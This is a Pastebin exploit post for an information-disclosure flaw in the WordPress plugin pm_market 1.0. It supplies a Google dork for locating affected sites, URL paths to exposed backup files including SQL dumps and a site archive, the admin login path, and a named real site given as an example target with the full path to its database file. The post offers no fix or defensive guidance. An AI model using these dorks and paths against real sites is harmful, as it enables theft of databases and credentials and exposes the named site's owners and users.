KingSkrupellos

WordPress pm_market 1.0 Database Backup

Nov 29th, 2018
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.74 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress pm_market Plugins 1.0 Database Backup Information Disclosure Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 30/11/2018
  6. # Vendor Homepage : wordpress.org ~ power.com.pl
  7. # Tested On : Windows and Linux
  8. # Category : WebApps
  9. # Version Information : 1.0
  10. # Google Dorks : inurl:''/wp-content/plugins/pm_market/backup/''
  11. + intext:Copyright © Power Media S.A. site:pl
  12. # Exploit Risk : Medium
  13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  14. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  15. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  16.  
  17. #################################################################################################
  18.  
  19. # Admin Panel Login Path :
  20.  
  21. /wp-login.php
  22.  
  23. # Exploit :
  24.  
  25. /wp-content/plugins/pm_market/backup/....
  26.  
  27. /wp-content/plugins/pm_market/backup/[YEAR]-[MONTH]-[DAY]/pm_market.sql
  28.  
  29. /wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql
  30.  
  31. /wp-content/plugins/pm_market/backup/2012-01-05/wordpress.sql
  32.  
  33. /wp-content/plugins/pm_market/backup/2012-01-05/www.zip
  34.  
  35. #################################################################################################
  36.  
  37. # Example Vulnerable Site =>
  38.  
  39. [+] klaster.kalisz.pl/wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql
  40.  
  41. #################################################################################################
  42.  
  43. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  44.  
  45. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment